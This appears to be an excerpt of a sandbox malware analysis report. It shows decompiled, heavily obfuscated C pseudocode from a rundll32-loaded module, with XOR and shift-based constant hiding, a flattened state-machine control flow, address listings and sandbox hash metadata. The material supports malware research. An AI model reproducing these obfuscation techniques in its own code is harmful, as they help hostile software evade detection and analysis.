                                                                                                                      				_v272 = _v272 ^ 0x0388d6fc;
                                                                                                                      				_v72 = 0xd0da8a;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 ^ 0x068dcd32;
                                                                                                                      				_v280 = 0xa513be;
                                                                                                                      				_v280 = _v280 + 0xffffcd90;
                                                                                                                      				_v280 = _v280 / _t785;
                                                                                                                      				_v280 = _v280 + 0xffffce89;
                                                                                                                      				_v280 = _v280 ^ 0x00081bd8;
                                                                                                                      				_v112 = 0xe9df;
                                                                                                                      				_t786 = 0x11;
                                                                                                                      				_v112 = _v112 * 0xd;
                                                                                                                      				_v112 = _v112 ^ 0xaf5ec247;
                                                                                                                      				_v112 = _v112 ^ 0xaf5aa6d7;
                                                                                                                      				_v180 = 0xdb028a;
                                                                                                                      				_v180 = _v180 * 0x1d;
                                                                                                                      				_v180 = _v180 >> 6;
                                                                                                                      				_v180 = _v180 ^ 0x0069b9f3;
                                                                                                                      				_v220 = 0xee6b4b;
                                                                                                                      				_v220 = _v220 << 3;
                                                                                                                      				_v220 = _v220 | 0xdc702aa0;
                                                                                                                      				_v220 = _v220 + 0x71ee;
                                                                                                                      				_v220 = _v220 ^ 0xdf76f250;
                                                                                                                      				_v296 = 0x23c05a;
                                                                                                                      				_v296 = _v296 * 0x5f;
                                                                                                                      				_v296 = _v296 * 0x36;
                                                                                                                      				_v296 = _v296 + 0xca24;
                                                                                                                      				_v296 = _v296 ^ 0xcc673138;
                                                                                                                      				_v176 = 0x22be9e;
                                                                                                                      				_v176 = _v176 * 0x5d;
                                                                                                                      				_v176 = _v176 >> 0xe;
                                                                                                                      				_v176 = _v176 ^ 0x000fc27c;
                                                                                                                      				_v120 = 0x3d033e;
                                                                                                                      				_v120 = _v120 | 0x1fa14a75;
                                                                                                                      				_v120 = _v120 / _t786;
                                                                                                                      				_v120 = _v120 ^ 0x01d2865b;
                                                                                                                      				_v212 = 0xed5cb5;
                                                                                                                      				_t787 = 0x53;
                                                                                                                      				_v212 = _v212 / _t787;
                                                                                                                      				_v212 = _v212 ^ 0x510fb6d8;
                                                                                                                      				_v212 = _v212 * 0x76;
                                                                                                                      				_v212 = _v212 ^ 0x5c26df9e;
                                                                                                                      				_v32 = 0x743d42;
                                                                                                                      				_v32 = _v32 * 0x19;
                                                                                                                      				_v32 = _v32 ^ 0x0b543fb1;
                                                                                                                      				_v140 = 0xd2e396;
                                                                                                                      				_v140 = _v140 + 0xbc2f;
                                                                                                                      				_v140 = _v140 | 0xffabdfb7;
                                                                                                                      				_v140 = _v140 ^ 0xfffefe2d;
                                                                                                                      				_v56 = 0xb6af07;
                                                                                                                      				_v56 = _v56 | 0x3c719b52;
                                                                                                                      				_v56 = _v56 ^ 0x3cf6fc1e;
                                                                                                                      				_v148 = 0x4e57f8;
                                                                                                                      				_v148 = _v148 / _t876;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x008180da;
                                                                                                                      				_t880 = 0x8b31915;
                                                                                                                      				_v44 = 0xa59d4d;
                                                                                                                      				_t877 = 0xef66089;
                                                                                                                      				_t788 = 0x2c;
                                                                                                                      				_v44 = _v44 / _t788;
                                                                                                                      				_v44 = _v44 ^ 0x000f19f4;
                                                                                                                      				_v60 = 0x2ad52f;
                                                                                                                      				_v60 = _v60 | 0x792352db;
                                                                                                                      				_v60 = _v60 ^ 0x7927d8fa;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t789 = 0x93fa1a;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t859 = 0x2c1be6e;
                                                                                                                      							do {
                                                                                                                      								L4:
                                                                                                                      								_t891 = _t765 - _t880;
                                                                                                                      								if(_t891 > 0) {
                                                                                                                      									__eflags = _t765 - 0x92c7fbc;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_t765 = 0x826e25d;
                                                                                                                      										goto L27;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t765 - 0xb519ee2;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											_push(_v132);
                                                                                                                      											_t654 =  &_v92; // 0xeb365c56
                                                                                                                      											_push( *_t654);
                                                                                                                      											_push(0x2b1518);
                                                                                                                      											_t759 = E002CFBCF(_v68,  &_v12, _v20, _v200, _v116, _v76, E002BAB66(_v84, _v124, __eflags), _v208, _v216, _v84,  &_v8);
                                                                                                                      											_t885 = _t885 + 0x30;
                                                                                                                      											__eflags = _t759 - _v108;
                                                                                                                      											_t765 =  ==  ? 0x2c1be6e : _t877;
                                                                                                                      											E002BAE03(_v100, _v184, _v192, _t757);
                                                                                                                      											goto L25;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t765 - 0xcf70aca;
                                                                                                                      											if(_t765 == 0xcf70aca) {
                                                                                                                      												E002B68DE(_v32, _v140, _v56, _v148, _v16);
                                                                                                                      												_t885 = _t885 + 0xc;
                                                                                                                      												_t765 = _t877;
                                                                                                                      												goto L1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t765 - _t877;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L27;
                                                                                                                      												} else {
                                                                                                                      													E002B7027(_v44, _v52, _v20, _v60);
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t891 == 0) {
                                                                                                                      										_t736 = E002C3B45(_v224, _v156, _v232, _v240, _v64, _v248, _v12, _v256, _v16, _v20, _t789, _v164,  &_v24, _v264);
                                                                                                                      										_t885 = _t885 + 0x30;
                                                                                                                      										__eflags = _t736 - _v28;
                                                                                                                      										_t789 = 0x93fa1a;
                                                                                                                      										_t738 = 0x70434dd;
                                                                                                                      										_t765 =  ==  ? 0x93fa1a : 0xcf70aca;
                                                                                                                      										goto L3;
                                                                                                                      									} else {
                                                                                                                      										if(_t765 == _t789) {
                                                                                                                      											_t739 = E002BBA16(_a24, _v172, _v24, _v272, _v72, _v280, _a20, _v288);
                                                                                                                      											_t885 = _t885 + 0x18;
                                                                                                                      											__eflags = _t739 - _v40;
                                                                                                                      											_t738 = 0x70434dd;
                                                                                                                      											_t765 =  ==  ? 0x70434dd : 0x275f79a;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t765 == 0x275f79a) {
                                                                                                                      												E002BE723(_v296, _v176, _v24, _v120, _v212);
                                                                                                                      												_t885 = _t885 + 0xc;
                                                                                                                      												_t765 = 0xcf70aca;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t765 == _t859) {
                                                                                                                      													_push(_t789);
                                                                                                                      													_push(_t789);
                                                                                                                      													_t745 = E002C3512(_v12);
                                                                                                                      													__eflags = _t745;
                                                                                                                      													_v16 = _t745;
                                                                                                                      													_t765 =  !=  ? _t880 : _t877;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														goto L2;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t765 == _t738) {
                                                                                                                      														_t746 = E002CFDA3(_v112, _a8, _v180, _v24, _v220, _v128, 0x20);
                                                                                                                      														_t885 = _t885 + 0x14;
                                                                                                                      														_t765 = 0x275f79a;
                                                                                                                      														__eflags = _t746 - _v252;
                                                                                                                      														_t883 =  ==  ? 1 : _t883;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															L2:
                                                                                                                      															_t789 = 0x93fa1a;
                                                                                                                      															L3:
                                                                                                                      															_t859 = 0x2c1be6e;
                                                                                                                      															goto L4;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														_t896 = _t765 - 0x826e25d;
                                                                                                                      														if(_t765 == 0x826e25d) {
                                                                                                                      															_push(_v96);
                                                                                                                      															_push(_v292);
                                                                                                                      															_push(0x2b1568);
                                                                                                                      															_t749 = E002BAB66(_v88, _v152, _t896);
                                                                                                                      															_push(_v136);
                                                                                                                      															_push(_v236);
                                                                                                                      															_push(0x2b1538);
                                                                                                                      															E002C0EDA(E002BAB66(_v168, _v48, _t896), _v276, _v104, _t749,  &_v20, _v196, _v284);
                                                                                                                      															_t765 =  ==  ? 0xb519ee2 : 0x7228e80;
                                                                                                                      															E002BAE03(_v268, _v228, _v160, _t749);
                                                                                                                      															E002BAE03(_v36, _v260, _v204, _t750);
                                                                                                                      															_t885 = _t885 + 0x3c;
                                                                                                                      															_t877 = 0xef66089;
                                                                                                                      															L25:
                                                                                                                      															_t880 = 0x8b31915;
                                                                                                                      															_t738 = 0x70434dd;
                                                                                                                      															_t789 = 0x93fa1a;
                                                                                                                      															_t859 = 0x2c1be6e;
                                                                                                                      														}
                                                                                                                      														goto L27;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L22:
                                                                                                                      								return _t883;
                                                                                                                      								L27:
                                                                                                                      							} while (_t765 != 0x7228e80);
                                                                                                                      							goto L22;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x002c1e3c
                                                                                                                      0x002c1e44
                                                                                                                      0x002c1e50
                                                                                                                      0x002c1e53
                                                                                                                      0x002c1e57
                                                                                                                      0x002c1e5f
                                                                                                                      0x002c1e6a
                                                                                                                      0x002c1e75
                                                                                                                      0x002c1e80
                                                                                                                      0x002c1e8b
                                                                                                                      0x002c1e96
                                                                                                                      0x002c1ea1
                                                                                                                      0x002c1ea8
                                                                                                                      0x002c1eb5
                                                                                                                      0x002c1ec0
                                                                                                                      0x002c1ec8
                                                                                                                      0x002c1ed4
                                                                                                                      0x002c1ed7
                                                                                                                      0x002c1ede
                                                                                                                      0x002c1ee9
                                                                                                                      0x002c1ef4
                                                                                                                      0x002c1f04
                                                                                                                      0x002c1f08
                                                                                                                      0x002c1f0d
                                                                                                                      0x002c1f12
                                                                                                                      0x002c1f1a
                                                                                                                      0x002c1f25
                                                                                                                      0x002c1f2d
                                                                                                                      0x002c1f40
                                                                                                                      0x002c1f47
                                                                                                                      0x002c1f52
                                                                                                                      0x002c1f5d
                                                                                                                      0x002c1f73
                                                                                                                      0x002c1f7a
                                                                                                                      0x002c1f85
                                                                                                                      0x002c1f97
                                                                                                                      0x002c1f9c
                                                                                                                      0x002c1fa5
                                                                                                                      0x002c1fb0
                                                                                                                      0x002c1fbb
                                                                                                                      0x002c1fc3
                                                                                                                      0x002c1fcb
                                                                                                                      0x002c1fd3
                                                                                                                      0x002c1fd8
                                                                                                                      0x002c1fe0
                                                                                                                      0x002c1fe8
                                                                                                                      0x002c1ff1
                                                                                                                      0x002c1ff6
                                                                                                                      0x002c1ffc
                                                                                                                      0x002c2004
                                                                                                                      0x002c200c
                                                                                                                      0x002c2017
                                                                                                                      0x002c2022
                                                                                                                      0x002c202d
                                                                                                                      0x002c2035
                                                                                                                      0x002c203d
                                                                                                                      0x002c2045
                                                                                                                      0x002c204d
                                                                                                                      0x002c2058
                                                                                                                      0x002c2063
                                                                                                                      0x002c206e
                                                                                                                      0x002c2079
                                                                                                                      0x002c2081
                                                                                                                      0x002c2086
                                                                                                                      0x002c208b
                                                                                                                      0x002c2090
                                                                                                                      0x002c2098
                                                                                                                      0x002c20a3
                                                                                                                      0x002c20ae
                                                                                                                      0x002c20b6
                                                                                                                      0x002c20c1
                                                                                                                      0x002c20cd
                                                                                                                      0x002c20d0
                                                                                                                      0x002c20dd
                                                                                                                      0x002c20e0
                                                                                                                      0x002c20e4
                                                                                                                      0x002c20e9
                                                                                                                      0x002c20f1
                                                                                                                      0x002c20fc
                                                                                                                      0x002c2104
                                                                                                                      0x002c210f
                                                                                                                      0x002c2117
                                                                                                                      0x002c2127
                                                                                                                      0x002c212b
                                                                                                                      0x002c2133
                                                                                                                      0x002c213b
                                                                                                                      0x002c214e
                                                                                                                      0x002c2151
                                                                                                                      0x002c2158
                                                                                                                      0x002c2163
                                                                                                                      0x002c216e
                                                                                                                      0x002c2181
                                                                                                                      0x002c2188
                                                                                                                      0x002c2190
                                                                                                                      0x002c219b
                                                                                                                      0x002c21a3
                                                                                                                      0x002c21a8
                                                                                                                      0x002c21b0
                                                                                                                      0x002c21b8
                                                                                                                      0x002c21c0
                                                                                                                      0x002c21cd
                                                                                                                      0x002c21d6
                                                                                                                      0x002c21da
                                                                                                                      0x002c21e2
                                                                                                                      0x002c21ea
                                                                                                                      0x002c21fd
                                                                                                                      0x002c2204
                                                                                                                      0x002c220c
                                                                                                                      0x002c2217
                                                                                                                      0x002c2222
                                                                                                                      0x002c2238
                                                                                                                      0x002c223f
                                                                                                                      0x002c224a
                                                                                                                      0x002c2256
                                                                                                                      0x002c225b
                                                                                                                      0x002c225f
                                                                                                                      0x002c226c
                                                                                                                      0x002c2270
                                                                                                                      0x002c2278
                                                                                                                      0x002c228b
                                                                                                                      0x002c2292
                                                                                                                      0x002c229d
                                                                                                                      0x002c22a8
                                                                                                                      0x002c22b3
                                                                                                                      0x002c22be
                                                                                                                      0x002c22c9
                                                                                                                      0x002c22d4
                                                                                                                      0x002c22df
                                                                                                                      0x002c22ea
                                                                                                                      0x002c22fe
                                                                                                                      0x002c2305
                                                                                                                      0x002c230f
                                                                                                                      0x002c231a
                                                                                                                      0x002c231f
                                                                                                                      0x002c232a
                                                                                                                      0x002c2338
                                                                                                                      0x002c233b
                                                                                                                      0x002c2342
                                                                                                                      0x002c234d
                                                                                                                      0x002c2358
                                                                                                                      0x002c2363
                                                                                                                      0x002c236e
                                                                                                                      0x002c236e
                                                                                                                      0x002c2373
                                                                                                                      0x002c2373
                                                                                                                      0x002c2373
                                                                                                                      0x002c2378
                                                                                                                      0x002c2378
                                                                                                                      0x002c2378
                                                                                                                      0x002c237d
                                                                                                                      0x002c237d
                                                                                                                      0x002c237d
                                                                                                                      0x002c237f
                                                                                                                      0x002c25fc
                                                                                                                      0x002c2602
                                                                                                                      0x002c2739
                                                                                                                      0x00000000
                                                                                                                      0x002c2608
                                                                                                                      0x002c2608
                                                                                                                      0x002c260e
                                                                                                                      0x002c2682
                                                                                                                      0x002c2689
                                                                                                                      0x002c2689
                                                                                                                      0x002c269e
                                                                                                                      0x002c26e9
                                                                                                                      0x002c26ee
                                                                                                                      0x002c26fc
                                                                                                                      0x002c2712
                                                                                                                      0x002c271c
                                                                                                                      0x00000000
                                                                                                                      0x002c2610
                                                                                                                      0x002c2610
                                                                                                                      0x002c2616
                                                                                                                      0x002c2673
                                                                                                                      0x002c2678
                                                                                                                      0x002c267b
                                                                                                                      0x00000000
                                                                                                                      0x002c2618
                                                                                                                      0x002c2618
                                                                                                                      0x002c261a
                                                                                                                      0x00000000
                                                                                                                      0x002c2620
                                                                                                                      0x002c263c
                                                                                                                      0x002c2642
                                                                                                                      0x002c261a
                                                                                                                      0x002c2616
                                                                                                                      0x002c260e
                                                                                                                      0x002c2385
                                                                                                                      0x002c2385
                                                                                                                      0x002c25d2
                                                                                                                      0x002c25d9
                                                                                                                      0x002c25e8
                                                                                                                      0x002c25ea
                                                                                                                      0x002c25ef
                                                                                                                      0x002c25f4
                                                                                                                      0x00000000
                                                                                                                      0x002c238b
                                                                                                                      0x002c238d
                                                                                                                      0x002c255c
                                                                                                                      0x002c2563
                                                                                                                      0x002c2572
                                                                                                                      0x002c2574
                                                                                                                      0x002c2579
                                                                                                                      0x00000000
                                                                                                                      0x002c2393
                                                                                                                      0x002c2399
                                                                                                                      0x002c251b
                                                                                                                      0x002c2520
                                                                                                                      0x002c2523
                                                                                                                      0x002c236e
                                                                                                                      0x002c236e
                                                                                                                      0x00000000
                                                                                                                      0x002c236e
                                                                                                                      0x002c239f
                                                                                                                      0x002c23a1
                                                                                                                      0x002c24db
                                                                                                                      0x002c24dc
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: B=t$D$D'$Kk$V\6$W7$\9$d_2$^$q
                                                                                                                      • API String ID: 0-1686049362
                                                                                                                      • Opcode ID: 28bc3e8e0e07511334ff854b65d5643efcadc6b62fe3412fea05d37800284915
                                                                                                                      • Instruction ID: f5bf49cab88037b0ce628852c454c910c5a345831289a799266f410aac098b8e
                                                                                                                      • Opcode Fuzzy Hash: 28bc3e8e0e07511334ff854b65d5643efcadc6b62fe3412fea05d37800284915
                                                                                                                      • Instruction Fuzzy Hash: 8A72FF715083819BD378CF65C58AB8FBBE2BBC4344F108A1DE2DA96260D7B18959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002C99AA() {
                                                                                                                      				void* _t393;
                                                                                                                      				signed int _t395;
                                                                                                                      				signed int _t396;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t416;
                                                                                                                      				void* _t420;
                                                                                                                      				intOrPtr* _t464;
                                                                                                                      				signed int _t468;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t472;
                                                                                                                      				signed int _t473;
                                                                                                                      				signed int _t474;
                                                                                                                      				signed int _t475;
                                                                                                                      				signed int _t476;
                                                                                                                      				signed int _t477;
                                                                                                                      				signed int _t478;
                                                                                                                      				signed int _t479;
                                                                                                                      				signed int _t480;
                                                                                                                      				signed int _t481;
                                                                                                                      				signed int _t482;
                                                                                                                      				signed int _t483;
                                                                                                                      				signed int _t485;
                                                                                                                      				void* _t489;
                                                                                                                      
                                                                                                                      				 *(_t489 + 0x98) = 0xc8da52;
                                                                                                                      				 *(_t489 + 0xa0) = 0;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x9c)) = 0xe0694f;
                                                                                                                      				_t420 = 0x1be807e;
                                                                                                                      				 *(_t489 + 0x30) = 0x503fa2;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) >> 8;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) | 0x613cd221;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0x613cd23e;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x18)) = 0x638b33;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x18)) =  *((intOrPtr*)(_t489 + 0x18)) + 0x7670;
                                                                                                                      				 *(_t489 + 0xa4) = 0;
                                                                                                                      				_t471 = 0x25;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x28) / _t471;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) + 0xfffff8bb;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) ^ 0x0002acab;
                                                                                                                      				 *(_t489 + 0x7c) = 0x85e0fa;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) + 0x3665;
                                                                                                                      				_t472 = 0x78;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) / _t472;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) ^ 0x00011e0c;
                                                                                                                      				 *(_t489 + 0x20) = 0x383fb4;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0xbc1f7ed2;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x73642c82;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) >> 0xa;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x003dbfb6;
                                                                                                                      				 *(_t489 + 0x5c) = 0xbb8564;
                                                                                                                      				_t473 = 0x44;
                                                                                                                      				 *(_t489 + 0x5c) =  *(_t489 + 0x5c) / _t473;
                                                                                                                      				_t474 = 0x6f;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x5c) * 0x17;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x00393d4f;
                                                                                                                      				 *(_t489 + 0x14) = 0x7f7e5e;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0xaaec;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0x89a4;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) >> 0xe;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0x000cd586;
                                                                                                                      				 *(_t489 + 0x98) = 0xf466ca;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21e472eb;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21177926;
                                                                                                                      				 *(_t489 + 0x8c) = 0xf41dfa;
                                                                                                                      				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) << 7;
                                                                                                                      				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) ^ 0x7a009fd6;
                                                                                                                      				 *(_t489 + 0x70) = 0x5bd344;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffffa539;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd954c9cc;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd906e478;
                                                                                                                      				 *(_t489 + 0x20) = 0x13a841;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) * 0x2b;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x070f8edd;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) / _t474;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x0006f8e9;
                                                                                                                      				 *(_t489 + 0x38) = 0xfa8d3a;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xb40d;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) >> 0xd;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xfffffdcd;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) ^ 0x0000539f;
                                                                                                                      				 *(_t489 + 0x48) = 0x9c2d9c;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) + 0xffff4328;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) | 0x335ced82;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) ^ 0x33dc9cbe;
                                                                                                                      				 *(_t489 + 0x80) = 0x96612e;
                                                                                                                      				_t475 = 0x1b;
                                                                                                                      				 *(_t489 + 0x84) =  *(_t489 + 0x80) * 6;
                                                                                                                      				 *(_t489 + 0x84) =  *(_t489 + 0x84) ^ 0x0382c053;
                                                                                                                      				 *(_t489 + 0x1c) = 0xc28e37;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffbfaa;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xcb4;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffb9e8;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) ^ 0x00c80396;
                                                                                                                      				 *(_t489 + 0x34) = 0xb1f5e0;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t475;
                                                                                                                      				_t476 = 0x71;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t476;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) | 0xfe0fc038;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xfe0a805e;
                                                                                                                      				 *(_t489 + 0x78) = 0xafc36d;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) >> 0xc;
                                                                                                                      				_t477 = 0x76;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) / _t477;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) ^ 0x000041ea;
                                                                                                                      				 *(_t489 + 0x98) = 0x19521f;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) | 0xd8938a8f;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0xd896baad;
                                                                                                                      				 *(_t489 + 0xa0) = 0x8c17;
                                                                                                                      				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) | 0xdec19f4d;
                                                                                                                      				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) ^ 0xdec779d8;
                                                                                                                      				 *(_t489 + 0xa4) = 0xd8bcc0;
                                                                                                                      				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) | 0xa8247ef5;
                                                                                                                      				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) ^ 0xa8ff4c77;
                                                                                                                      				 *(_t489 + 0x28) = 0x29b40a;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) + 0xffff8872;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0xb7a5f24a;
                                                                                                                      				_t478 = 0x4b;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) * 0x6c;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0x6f6c7a54;
                                                                                                                      				 *(_t489 + 0x58) = 0x4b8f45;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) / _t478;
                                                                                                                      				_t479 = 0x65;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) * 0x3a;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x003d129f;
                                                                                                                      				 *(_t489 + 0x50) = 0xbe9ee7;
                                                                                                                      				 *(_t489 + 0x50) =  *(_t489 + 0x50) / _t479;
                                                                                                                      				_t480 = 0x21;
                                                                                                                      				 *(_t489 + 0x4c) =  *(_t489 + 0x50) / _t480;
                                                                                                                      				 *(_t489 + 0x4c) =  *(_t489 + 0x4c) ^ 0x0002cf44;
                                                                                                                      				 *(_t489 + 0x60) = 0x65600b;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) | 0xec945ebd;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) >> 3;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x1d945acd;
                                                                                                                      				 *(_t489 + 0x2c) = 0xa0640b;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) >> 0xc;
                                                                                                                      				_t487 =  *(_t489 + 0x80);
                                                                                                                      				_t481 = 0x18;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x2c) / _t481;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) + 0xffff1131;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0xfffa9798;
                                                                                                                      				 *(_t489 + 0x88) = 0xf27f7;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) | 0x77366d7c;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x7735274d;
                                                                                                                      				 *(_t489 + 0x60) = 0x482c82;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 3;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 6;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x9054890c;
                                                                                                                      				 *(_t489 + 0x70) = 0x370d16;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff6d24;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff76cf;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0x00352e72;
                                                                                                                      				 *(_t489 + 0x68) = 0x1def33;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) << 6;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) | 0x037a4cde;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) ^ 0x077b4a65;
                                                                                                                      				 *(_t489 + 0x6c) = 0xb09c0e;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) | 0xdb8bd061;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) << 0xb;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) ^ 0xdee5f4d6;
                                                                                                                      				 *(_t489 + 0x54) = 0x47a16a;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x8e9bba09;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x2cf08045;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0xa22d7119;
                                                                                                                      				 *(_t489 + 0x94) = 0xf12a19;
                                                                                                                      				 *(_t489 + 0x94) =  *(_t489 + 0x94) >> 0xe;
